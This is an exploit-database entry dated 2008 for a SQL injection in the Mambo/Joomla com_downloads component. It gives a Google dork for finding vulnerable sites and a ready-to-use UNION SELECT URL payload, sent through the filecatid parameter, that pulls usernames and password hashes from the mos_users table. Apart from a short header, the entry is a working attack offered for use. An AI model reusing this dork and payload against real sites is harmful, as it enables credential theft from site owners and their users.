id: 2609
date: 02/06/2008
title: Mambo Component com_downloads Remote SQL Injection Vulnerability
author: S@BUN
cves: 

================================================================
Mambo Component com_downloads Remote SQL Injection Vulnerability
================================================================




#########################################################################
#
# joomla SQL Injection(com_downloads)(filecatid)
#
#
#########################################################################
#
# DORKS 1 : allinurl :"com_downloads"filecatid
#
##########################################################################
EXPLOIT :

index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*






#  0day.today [2023-03-22]  #